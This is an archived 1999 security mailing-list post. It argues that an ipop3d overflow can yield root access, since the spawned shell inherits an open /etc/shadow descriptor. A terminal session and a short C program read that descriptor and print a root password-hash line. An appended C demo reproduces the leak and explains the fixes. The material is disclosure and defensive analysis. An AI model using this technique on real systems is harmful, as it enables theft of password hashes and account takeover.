Re: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight

From: M.C.Mar (woloszynat_private)
Date: Thu Apr 08 1999 - 07:39:30 PDT

    On Tue, 6 Apr 1999, Stefan Rompf wrote:
    
    > Hello Michal,
    >
    > At 01:41 07.03.99 +0100, you wrote:
    >
    > >Exploited overflow in ipop3d could be used to gain superuser access (the
    > >only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
    >
    > Fortunately, you are wrong here. Quoting from the Solaris' setuid() manpage:
    >
    >     If the effective user ID of the process calling setuid()  is
    >     the  super-user, the real, effective, and saved user IDs are
    >     set to the uid parameter.
    >
    > Linux behaves the same way, IMHO this is defined in POSIX.
    >
    But, (un)fortunately when exploiting ipop3d I found something like this:
    
    Grabarz:~emsi# lsof -n | grep 1190
    sh        1190 emsi  cwd    DIR        8,1    1024        2 /
    sh        1190 emsi  rtd    DIR        8,1    1024        2 /
    sh        1190 emsi  txt    REG        8,1  279352    16324 /bin/bash
    sh        1190 emsi  mem    REG        8,1   78828    30629 /lib/ld-linux.so.1.9.5
    sh        1190 emsi  mem    REG        8,1   11493    79564 /lib/libtermcap.so.2.0.8
    sh        1190 emsi  mem    REG        8,1  605044    79566 /lib/libc.so.5.4.33
    [...]
    sh        1190 emsi    3r   REG        8,1     598    24674 /etc/shadow
    
    Shell spawned via ipop3d exploitation (no bonus -- no exploit core) inherits
    opened fds :)
    
    So we may do something like this:
    
    emsi:~emsi# telnet grabarz 110
    Trying 192.168.0.19...
    Connected to grabarz.
    Escape character is '^]'.
    +OK Grabarz POP3 3.3(20) w/IMAP2 client (Comments to MRCat_private) at Fri, 9 Apr 1999 15:19:33 +0000 (   )
    user emsi
    +OK User name accepted, password please
    pass qpqp01
    id;
    uid=1002(emsi) gid=100(users) groups=100(users)
    : command not found
    bash -i;
    bash$ cd ~emsi
    cd ~emsi
    bash$
    bash$ cat p.c
    cat p.c
    #include <stdio.h>
    #include <unistd.h>
    int main(void) {
            char buf[255];
            lseek(3,0,0);          /* fd 3 is /etc/shadow, inherited from ipop3d; rewind it */
            read(3,buf,255);       /* no NUL terminator, so the printf runs past the data */
            printf("Be my guest:\n%s\n",buf);
    }
    bash$
    bash$ gcc p.c
    gcc p.c
    bash$
    ./a.out
    Be my guest:
    root:csKcGWMEUMGUs:10539:0:::::
    halt:*:9797:0:::::
    operator:*:9797:0:::::
    shutdown:*:9797:0:::::
    sync:*:9797:0:::::
    bin:*:9797:0:::::
    ftp:*:9797:0:::::
    daemon:*:9797:0:::::
    adm:*:9797:0:::::
    lp:*:9797:0:::::
    mail:*:9797:0:::::
    postmaster:*:9797:0:::::
    newż¤ţ^
    `
    bash$
    bash$
    
    That's only an example... It proves that exploiting ipop3d could be useful
    to obtain root (or any other account) access and that the vulnerability
    should be fixed.
    
    P.S.
    Greetings Lam3rZ Group, 3Kombajd_do_czereśni testers and Lcamtuf (you lamer,
    will you finally send me that txt you promised me? ;).
    
    --
    ___________________________________________________________________________
    M.C.Mar   An NT server can be run by an idiot, and usually is.   emsiat_private
          "If you can't make it good, make it LOOK good." - Bill Gates
      Maybe this isn't the place, but M$ programs, for instance, are veritable monuments to stupidity.
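The descriptor leak shown in the post, reproduced as an added example (this is not code from the original message, nor from ipop3d) against a constructed stand-in for /etc/shadow. The program opens a temp file the way a daemon would open the shadow file, consumes it as the password check would, makes it unreadable, and then measures what a forked child (the in-process attacker, like p.c above) and an exec'd /bin/sh can still read from the inherited fd. The file path, the `SECRET` line and the `scenario()` helper are assumptions made for the demo.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed stand-in for a shadow line: not a real hash, not a real file. */
static const char SECRET[] = "root:$1$constructed$notarealhash:10539:0:::::\n";

/* Read everything from rfd into out (NUL-terminated); returns byte count. */
static ssize_t drain(int rfd, char *out, size_t outlen)
{
    ssize_t total = 0, n;
    while (total < (ssize_t)outlen - 1 &&
           (n = read(rfd, out + total, outlen - 1 - total)) > 0)
        total += n;
    out[total] = '\0';
    return total;
}

/* Privileged phase of the daemon: write the secret to a temp file, open it with
 * `flags`, consume it (as the password check would, so the offset sits at EOF),
 * then make the file unreadable. A fresh open() is now refused for an
 * unprivileged caller, but the fd we hold keeps working: Unix checks
 * permissions at open() time only. The path is returned for later unlink(). */
static int open_secret(int flags, char *path, size_t pathlen)
{
    char tmpl[] = "/tmp/shadow-demo-XXXXXX", scratch[256];
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    if (write(fd, SECRET, sizeof SECRET - 1) != (ssize_t)(sizeof SECRET - 1)) {
        close(fd); unlink(tmpl); return -1;
    }
    close(fd);
    if ((fd = open(tmpl, flags)) < 0) { unlink(tmpl); return -1; }
    while (read(fd, scratch, sizeof scratch) > 0) ;   /* offset now at EOF */
    chmod(tmpl, 0);
    snprintf(path, pathlen, "%s", tmpl);
    return fd;
}

/* What p.c does, from a forked child: rewind the inherited fd and read it.
 * This is the in-process attacker's view (shellcode, forked shell), so
 * O_CLOEXEC cannot help; only closing the fd after use does. The lseek() is
 * required because the daemon already read the file and the offset is shared. */
static ssize_t read_inherited_fd(int fd, char *out, size_t outlen)
{
    int p[2];
    if (pipe(p) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char buf[256];
        close(p[0]);
        lseek(fd, 0, SEEK_SET);
        ssize_t n = read(fd, buf, sizeof buf);
        if (n > 0 && write(p[1], buf, (size_t)n) < 0) _exit(1);
        _exit(0);
    }
    close(p[1]);
    ssize_t got = drain(p[0], out, outlen);
    close(p[0]);
    waitpid(pid, NULL, 0);
    return got;
}

/* Spawn /bin/sh as the exploited ipop3d did and let it try `cat <&N`.
 * Returns 1 if the exec'd shell still had the fd (bytes came back), else 0.
 * O_CLOEXEC closes the fd across execve(), so this is the case it defends. */
static int fd_survives_exec(int fd)
{
    int p[2];
    char out[256];
    lseek(fd, 0, SEEK_SET);      /* sh cannot seek; rewind here, offset is shared */
    if (pipe(p) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char cmd[64];
        snprintf(cmd, sizeof cmd, "cat 2>/dev/null <&%d", fd);
        dup2(p[1], STDOUT_FILENO);
        close(p[0]); close(p[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(p[1]);
    ssize_t got = drain(p[0], out, sizeof out);
    close(p[0]);
    waitpid(pid, NULL, 0);
    return got > 0;
}

/* Run both attacker views against a fd opened with `flags`.
 * Bit 0: a forked child (in-process code) read the secret.
 * Bit 1: an exec'd /bin/sh read the secret. */
int scenario(int flags)
{
    char path[64], out[256];
    int result = 0;
    int fd = open_secret(flags, path, sizeof path);
    if (fd < 0) return -1;
    if (read_inherited_fd(fd, out, sizeof out) > 0 && strcmp(out, SECRET) == 0)
        result |= 1;
    if (fd_survives_exec(fd))
        result |= 2;
    close(fd);                   /* the real fix: do not keep it open at all */
    unlink(path);
    return result;
}

int main(void)
{
    printf("O_RDONLY           -> %d (3: fork and exec both leak)\n", scenario(O_RDONLY));
    printf("O_RDONLY|O_CLOEXEC -> %d (1: exec protected, in-process not)\n",
           scenario(O_RDONLY | O_CLOEXEC));
    return 0;
}
```

Assumes a writable /tmp and /bin/sh. The two results carry the caveat a practitioner wants: O_CLOEXEC (or closing descriptors 3 and up before exec) stops the spawned shell from seeing the file, but shellcode running inside the exploited daemon still holds the descriptor, so the complete remedy is to close() the shadow file as soon as the password check is done, before any untrusted input is parsed.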
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:46 PDT